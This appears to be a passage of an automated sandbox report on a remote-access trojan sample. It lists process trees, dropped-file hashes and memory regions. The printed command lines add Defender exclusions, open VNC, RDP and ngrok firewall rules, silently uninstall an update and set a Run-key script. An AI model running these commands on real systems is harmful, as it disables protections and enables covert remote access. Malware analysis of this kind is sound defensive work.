      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming

    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\ & exit
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Program Files\RDP Wrapper & exit
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Program Files\RDP Wrapper
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom.exe & exit
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom.exe

    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom\winvnc.exe & exit

      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom\winvnc.exe
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom\ngrok.exe & exit

      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom\ngrok.exe
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom\enableff.exe & exit

      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom\enableff.exe

    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom\Adduser.exe & exit

      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom\Adduser.exe

    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom\ngrok.exe & exit

      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom\ngrok.exe

    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom\Venomadd.exe & exit

      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom\Venomadd.exe

    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom\Venomdpr.exe & exit

      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom\Venomdpr.exe

    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom\autoupdate1.exe & exit

    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom\autoupdate2.exe & exit

    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Venom\update.exe & exit

    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\enableff.exe & exit

    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\allow.exe & exit

    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\VenomDWelbasiD.exe & exit

    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Program Files\RDP Wrapper & exit

    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" /k start /b netsh advfirewall firewall add rule name=vnc action=allow dir=in protocol=tcp localport=5901 & exit

    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" /k netsh advfirewall firewall add rule name="Venom-winvnc" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\Venom\Venom-winvnc.exe" enable=yes & exit

    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" /k netsh advfirewall firewall add rule name="Venom-ngrok" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\Venom\Venom-ngrok.exe" enable=yes & exit

    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" /k netsh advfirewall firewall add rule name="Venom-winvnc" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\Venom\ngrok.exe" enable=yes & exit

    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" /k netsh advfirewall firewall add rule name="Venom-winvnc" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\Venom\winvnc.exe" enable=yes & exit

    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" /k netsh advfirewall firewall add rule name="Venom-winvnc" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\Venom\rdpinstall.exe" enable=yes & exit

    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" /k netsh advfirewall firewall add rule name="Venom-winvnc" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\Venom\rdpinstall.exe" enable=yes & exit

    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" /k netsh advfirewall firewall add rule name="Windows Folder" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\Venom\autoupdate1.exe" enable=yes & exit

    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" /k netsh advfirewall firewall add rule name="Windows Service" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\Venom\autoupdate2.exe" enable=yes & exit

The captured tree ends here. The loader.exe branch (PID 1376, with its cmd.exe child 820 that made the blocklisted network requests) appears only in the signature tables, not in this portion of the tree. The exclusion and firewall commands name files under %APPDATA%\Venom\ and "C:\Program Files\RDP Wrapper" that are never seen being written or executed within the run, so they describe what the operator intends to deploy rather than what ran in the sandbox.
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k netsh advfirewall firewall add rule name="Windows Task" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\Venom\update.exe" enable=yes & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k netsh advfirewall firewall add rule name="Windows" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\Venom\venom_nkrok.exe" enable=yes & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k netsh advfirewall firewall add rule name="Windows System" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\venom\nkrok.exe" enable=yes & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "ngrok" -Direction Inbound -Program "C:\Users\Admin\AppData\Roaming\Venom\Venom-ngrok.exe" -Action Allow & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "ngrok" -Direction Outbound -Program "C:\Users\Admin\AppData\Roaming\Venom\Venom-ngrok.exe" -Action Allow & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "vnc" -Direction Inbound -Program "C:\Users\Admin\AppData\Roaming\Venom\Venom-winvnc.exe" -Action Allow & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "rdp" -Direction Inbound -Program "C:\Users\Admin\AppData\Roaming\Venom\rdpinstall.exe" -Action Allow & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "vnc" -Direction Outbound -Program "C:\Users\Admin\AppData\Roaming\Venom\Venom-winvnc.exe" -Action Allow & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "rdp" -Direction Outbound -Program "C:\Users\Admin\AppData\Roaming\Venom\rdpinstall.exe" -Action Allow & exit3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "Google" -Direction Inbound -Program "C:\Users\Admin\AppData\Roaming\Venom\ngrok.exe" -Action Allow & exit3⤵
- Blocklisted process makes network request
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "Google" -Direction Outbound -Program "C:\Users\Admin\AppData\Roaming\Venom\ngrok.exe" -Action Allow & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "Chrome" -Direction Inbound -Program "C:\Users\Admin\AppData\Roaming\Venom\winvnc.exe" -Action Allow & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "Chrome" -Direction Outbound -Program "C:\Users\Admin\AppData\Roaming\Venom\winvnc.exe" -Action Allow & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "Windows Update" -Direction Inbound -Program "C:\Users\Admin\AppData\Roaming\Venom\rdpinstall.exe" -Action Allow & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "Windows Update" -Direction Outbound -Program "C:\Users\Admin\AppData\Roaming\Venom\rdpinstall.exe" -Action Allow & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "Windows task" -Direction Inbound -Program "C:\Users\Admin\AppData\Roaming\Venom\autoupdate1.exe" -Action Allow & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "Windows task" -Direction Outbound -Program "C:\Users\Admin\AppData\Roaming\Venom\autoupdate1.exe" -Action Allow & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "Windows Service" -Direction Inbound -Program "C:\Users\Admin\AppData\Roaming\Venom\autoupdate2.exe" -Action Allow & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "Windows Service" -Direction Outbound -Program "C:\Users\Admin\AppData\Roaming\Venom\autoupdate2.exe" -Action Allow & exit3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "Windows Folder" -Direction Inbound -Program "C:\Users\Admin\AppData\Roaming\Venom\update.exe" -Action Allow & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "Windows Folder" -Direction Outbound -Program "C:\Users\Admin\AppData\Roaming\Venom\update.exe" -Action Allow & exit3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "Windows" -Direction Inbound -Program "C:\Users\Admin\AppData\Roaming\Venom\venom_nkrok.exe" -Action Allow & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "Windows System" -Direction Inbound -Program "C:\Users\Admin\AppData\Roaming\venom\nkrok.exe" -Action Allow & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "Windows" -Direction Outbound -Program "C:\Users\Admin\AppData\Roaming\Venom\venom_nkrok.exe" -Action Allow & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k powershell New-NetFirewallRule -DisplayName "Windows System" -Direction Outbound -Program "C:\Users\Admin\AppData\Roaming\venom\nkrok.exe" -Action Allow & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b netsh advfirewall firewall add rule name=vnc action=allow dir=in protocol=tcp localport=5900 & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Program Files (x86)\RDP Wrapper & exit3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b wusa /uninstall /kb:4471332 /quiet & exit3⤵
-
C:\Users\Admin\AppData\Roaming\loader.exe"C:\Users\Admin\AppData\Roaming\loader.exe"2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\loader.exe"C:\Users\Admin\AppData\Roaming\loader.exe"3⤵
-
C:\Users\Admin\AppData\Roaming\loader.exe"C:\Users\Admin\AppData\Roaming\loader.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\loader.exe"C:\Users\Admin\AppData\Roaming\loader.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\loader.exe"C:\Users\Admin\AppData\Roaming\loader.exe"6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Execution.vbs"1⤵
- Adds Run key to start application
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies registry class
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Execution.vbs
MD5 a76dc4fbd53fe8d087cb78ff16134a26
SHA1 8f565d5b491f4f7b27e6af34bb7798f9b5bb558b
SHA256 b15dbb3f1554b1e6b0a66423df0a205b157276e2e3d31d7a1c7dd480d615e1e6
SHA512 69de3d0f22c921f07e0db2324d4dfcec717a1cdcb47b24f19a53d21f7876b9099ff1a7e44ae037c38e1cc864d53b8ecac45c8b376bd7e497dd745c4347307470
-
C:\Users\Admin\AppData\Local\Execution2.vbs
MD5 cf1d37e3ccdde125c06f1383c88d9358
SHA1 dcb51cbdab941e7cec28817ffae2fba1f27f1931
SHA256 35873184c68848d8275eea24d4484870cad72972c34e4c553786fec6f4321d7a
SHA512 dade8e3835b9f4b317ab2a7e4e52b4df619b4e1ccb3ede46d90a440b77da1f9ffb30804e5b889c866661122f16b6a44319b71ddaf277f4bb43acf24f076b3d0b
-
C:\Users\Admin\AppData\Local\Execution5.vbs
MD5 05a460cc05b28e1fc6ee9aadd0e2e7b1
SHA1 4ac79e93d6467e809acfbb2a5b0370537fb99460
SHA256 2e841a3b2fcb2f3e5f87a25656a85cd6ea8bd9c04421ac636239fccc5f7cc7a9
SHA512 471f54955d054cfe3b2f23a801e84f7261e70271c18bc9bba736cab948a6c4544b62b40f318d4a55df29e3e640f0529432fe7b69822238dbbcec222da86b13f7
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\8YCK9U05\Xvl[1].exe
MD5 cc902def500205aab6f429545192f812
SHA1 2ccfceac617697f11bc060843f2ac81dcd655244
SHA256 ec1235d8980d63398de5811dc806194fa522565436f820e1f90424e7d4b4a0a1
SHA512 f7d6976187a4be1c825b058ab7db4cfea5e679288b4384352f9782aa69975ab9b302352da3fbf9f3ee30262479e2e273d60c46567dc184e4919314c5dc27d92f
-
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe
MD5 88ab0bb59b0b20816a833ba91c1606d3
SHA1 72c09b7789a4bac8fee41227d101daed8437edeb
SHA256 f4fb42c8312a6002a8783e2a1ab4571eb89e92cd192b1a21e8c4582205c37312
SHA512 05cff2ca00ba940d9371c469bce6ffb4795c845d77525b8a1d4919f708296e66c0a6f3143c5964f5e963955e4f527a70624651113e72dc977f5ef40fa0276857
-
C:\Users\Admin\AppData\Local\Temp\compile.vbs
MD5 ca906422a558f4bc9e471709f62ec1a9
SHA1 e3da070007fdeae52779964df6f71fcb697ffb06
SHA256 abf09cb96f4c04a1d2d2bfd7184da63dd79c2109b1a768ca5dae4265def39eee
SHA512 661d4b4130ba12281527db418f71b7213dab62931806e2bd48690cfaed65b8a2859e5b161eaa4152d5a18babb54d6c2203f4ef5e3a1153c468d67703fd79f66b
-
C:\Users\Admin\AppData\Local\Temp\config
MD5 6c5c5aaadd88e8c19bbed9b070d135ef
SHA1 abc6ecb99646ddafb3575b01e0f65ca48da4e55c
SHA256 0e9e23a0758e739f54690f1b3f3880731d23bb5592e30badbe2fd857d3e77a15
SHA512 94e0653ef293aa4fcff73244554ec0c158c8e781af122b063f189972d92261a208591d51a0d3a08077ffde15311717e9d8c0404b810bfc182bc4cd66c3781bc1
-
C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\A148453D7DB34E8789CC5F9EFA2DDF22DAAD9ADB
MD5 8d9ae8f584f8ec4a42c1b44c6c28e276
SHA1 803b39c50ae97bbb8abe54d462be2e4aa056db53
SHA256 dd2477744f96c5565d717a4167fa804f9400645d0ffe16d347e3ab8b32405d30
SHA512 e34a522edd605fe2d8ab774a5a993388b744759f1d016038790e4d128f764806020321f1b65fb47203d4f344158eedc5f53145ef483d7800e731c24dd9bbeef0
-
C:\Users\Admin\AppData\Roaming\keylogger py best.exe
MD5 a20d50809d850ea9621ec8056ca52ee9
SHA1 47cd25041ec4a8c2ef397c2afd09fd2aaf6d3cd7
SHA256 ceeedbfa74c764a7a927e33d3a8fe3fd6f2de12af2a7d9e0558062c3afa0581f
SHA512 0f5b564403149bb0ca7851e989b433f00152ec9a95e0c52f4f3fc86f29832cc803c4969b4d06c1823b436facd6d987c448d5c640f01cc011025abe21a523643f
-
C:\Users\Admin\AppData\Roaming\loader.exe
MD5 cd8ab729965533ed53755d09ad10c790
SHA1 d09623a311dad9eb598cd2ef234ea1d6bfaf318e
SHA256 9e8d78ad8a4a11f3904d7cb5b06d08ffdb73262f2f44d810e5b5b6dcb15c736f
SHA512 834714dbbad108be2c1a52f0338782b4fee10b9ab999526dd175b338fe98b58857e36104a5300e989ae9bfa1e7432004ab5a5d422c9d23067941457f7abc6b0f
-
C:\Users\Admin\AppData\Roaming\loader.exe
MD5 cc902def500205aab6f429545192f812
SHA1 2ccfceac617697f11bc060843f2ac81dcd655244
SHA256 ec1235d8980d63398de5811dc806194fa522565436f820e1f90424e7d4b4a0a1
SHA512 f7d6976187a4be1c825b058ab7db4cfea5e679288b4384352f9782aa69975ab9b302352da3fbf9f3ee30262479e2e273d60c46567dc184e4919314c5dc27d92f
-
C:\Users\Admin\AppData\Roaming\loader.exe
MD5 9afa5b759296fb418e2bcb1b43894945
SHA1 32ae808e83aa68d2c093357ad60bb9cd5aeb16d9
SHA256 987506daa9d7e8c4c64395c241b944f42a80fb74d5cb0a2f7e86d33b3f725155
SHA512 54fcfe17b96c338957839c54880a8e7f7fed220e4200886f28420a194c17325585a73b0ee5f15daf281a2569cf02bd4f246bf00931803e3ee1d5d64df1d2da36
-
C:\Users\Admin\AppData\Roaming\rat v6.exe
MD5 8a177113878be7de28f07a9f2b2bd56a
SHA1 355d23771a07b4c6aaf86c6c28eb61f873b7e000
SHA256 26fd51dc28ce76d5aa5914bdf6f9cac0a6afd41d1f13c9af2c299f92e339216d
SHA512 1407fc16318918f0314bcf8ad9c5c7e2690f7fd3260246b93e131f83ff355cc52528e1cd13cd2ef809000673b070508ae0b675de4554090fac8483be8ffe6b6b
-
C:\Windows\SysWOW64\Realtek® High Definition Audio Driver\Driver.exe
MD5 8a177113878be7de28f07a9f2b2bd56a
SHA1 355d23771a07b4c6aaf86c6c28eb61f873b7e000
SHA256 26fd51dc28ce76d5aa5914bdf6f9cac0a6afd41d1f13c9af2c299f92e339216d
SHA512 1407fc16318918f0314bcf8ad9c5c7e2690f7fd3260246b93e131f83ff355cc52528e1cd13cd2ef809000673b070508ae0b675de4554090fac8483be8ffe6b6b
-
memory/344-206-0x0000000003550000-0x0000000003551000-memory.dmp  Filesize 4KB
-
memory/344-205-0x0000000003550000-0x0000000003551000-memory.dmp  Filesize 4KB
-
memory/344-236-0x0000000004F60000-0x0000000004F61000-memory.dmp  Filesize 4KB
-
memory/344-202-0x0000000000000000-mapping.dmp
-
memory/344-239-0x0000000004F62000-0x0000000004F63000-memory.dmp  Filesize 4KB
-
memory/820-160-0x0000000000000000-mapping.dmp
-
memory/888-161-0x0000000000000000-mapping.dmp
-
memory/888-171-0x0000000004FA0000-0x000000000549E000-memory.dmp  Filesize 5.0MB
-
memory/956-191-0x0000000000000000-mapping.dmp
-
memory/1016-303-0x0000000000000000-mapping.dmp
-
memory/1104-323-0x0000000000000000-mapping.dmp
-
memory/1196-324-0x0000000000000000-mapping.dmp
-
memory/1200-176-0x0000000000000000-mapping.dmp
-
memory/1232-215-0x0000000000000000-mapping.dmp
-
memory/1260-188-0x0000000000000000-mapping.dmp
-
memory/1304-300-0x0000000000000000-mapping.dmp
-
memory/1340-172-0x0000000006550000-0x0000000006554000-memory.dmp  Filesize 16KB
-
memory/1340-129-0x0000000005660000-0x0000000005661000-memory.dmp  Filesize 4KB
-
memory/1340-148-0x00000000061A0000-0x00000000061A1000-memory.dmp  Filesize 4KB
-
memory/1340-167-0x0000000006670000-0x0000000006671000-memory.dmp  Filesize 4KB
-
memory/1340-137-0x0000000005160000-0x000000000565E000-memory.dmp  Filesize 5.0MB
-
memory/1340-122-0x0000000000000000-mapping.dmp
-
memory/1340-154-0x0000000006570000-0x0000000006571000-memory.dmp  Filesize 4KB
-
memory/1340-127-0x00000000008C0000-0x00000000008C1000-memory.dmp  Filesize 4KB
-
memory/1340-132-0x0000000005230000-0x0000000005231000-memory.dmp  Filesize 4KB
-
memory/1376-151-0x00007FFB93DD0000-0x00007FFB93FAB000-memory.dmp  Filesize 1.9MB
-
memory/1376-153-0x00007FFB92070000-0x00007FFB921BA000-memory.dmp  Filesize 1.3MB
-
memory/1376-152-0x00007FFB92330000-0x00007FFB923DE000-memory.dmp  Filesize 696KB
-
memory/1376-139-0x0000000140000000-0x0000000141434000-memory.dmp  Filesize 20.2MB
-
memory/1376-150-0x00007FFB93FB0000-0x00007FFB93FB2000-memory.dmp  Filesize 8KB
-
memory/1376-133-0x0000000000000000-mapping.dmp
-
memory/1404-231-0x0000000004340000-0x0000000004341000-memory.dmp  Filesize 4KB
-
memory/1404-197-0x00000000007E0000-0x00000000007E1000-memory.dmp  Filesize 4KB
-
memory/1404-233-0x0000000004342000-0x0000000004343000-memory.dmp  Filesize 4KB
-
memory/1404-193-0x0000000000000000-mapping.dmp
-
memory/1404-199-0x00000000007E0000-0x00000000007E1000-memory.dmp  Filesize 4KB
-
memory/1532-290-0x0000000000000000-mapping.dmp
-
memory/1564-181-0x0000000000000000-mapping.dmp
-
memory/1572-196-0x0000000000000000-mapping.dmp
-
memory/1644-241-0x0000000004AB0000-0x0000000004AB1000-memory.dmp  Filesize 4KB
-
memory/1644-223-0x0000000000000000-mapping.dmp
-
memory/1644-235-0x0000000003050000-0x0000000003051000-memory.dmp  Filesize 4KB
-
memory/1644-271-0x0000000004AB2000-0x0000000004AB3000-memory.dmp  Filesize 4KB
-
memory/1644-238-0x0000000003050000-0x0000000003051000-memory.dmp  Filesize 4KB
-
memory/1680-318-0x0000000000000000-mapping.dmp
-
memory/1688-194-0x0000000003240000-0x0000000003241000-memory.dmp  Filesize 4KB
-
memory/1688-217-0x00000000070F0000-0x00000000070F1000-memory.dmp  Filesize 4KB
-
memory/1688-190-0x0000000000000000-mapping.dmp
-
memory/1688-192-0x0000000003240000-0x0000000003241000-memory.dmp  Filesize 4KB
-
memory/1688-225-0x00000000070F2000-0x00000000070F3000-memory.dmp  Filesize 4KB
-
memory/1772-145-0x0000027FF4490000-0x0000027FF4491000-memory.dmp  Filesize 4KB
-
memory/1772-140-0x0000000000000000-mapping.dmp
-
memory/1772-156-0x0000027FF6E50000-0x0000027FF718B000-memory.dmp  Filesize 3.2MB
-
memory/1772-157-0x0000027FF4890000-0x0000027FF4891000-memory.dmp  Filesize 4KB
-
memory/1772-158-0x0000027FF64C0000-0x0000027FF64C1000-memory.dmp  Filesize 4KB
-
memory/1772-166-0x0000027FF6C50000-0x0000027FF6CFC000-memory.dmp  Filesize 688KB
-
memory/1772-159-0x0000027FF6E40000-0x0000027FF6E42000-memory.dmp  Filesize 8KB
-
memory/1808-178-0x0000000000000000-mapping.dmp
-
memory/1888-212-0x0000000000000000-mapping.dmp
-
memory/2200-302-0x0000000000000000-mapping.dmp
-
memory/2228-207-0x0000000000000000-mapping.dmp
-
memory/2320-136-0x0000000001190000-0x0000000001191000-memory.dmp  Filesize 4KB
-
memory/2320-131-0x0000000005350000-0x0000000005351000-memory.dmp  Filesize 4KB
-
memory/2320-124-0x00000000011B0000-0x00000000011B1000-memory.dmp  Filesize 4KB
-
memory/2320-119-0x0000000000000000-mapping.dmp
-
memory/2532-118-0x0000000003330000-0x0000000003331000-memory.dmp  Filesize 4KB
-
memory/2892-204-0x0000000000000000-mapping.dmp
-
memory/3092-325-0x0000000000000000-mapping.dmp
-
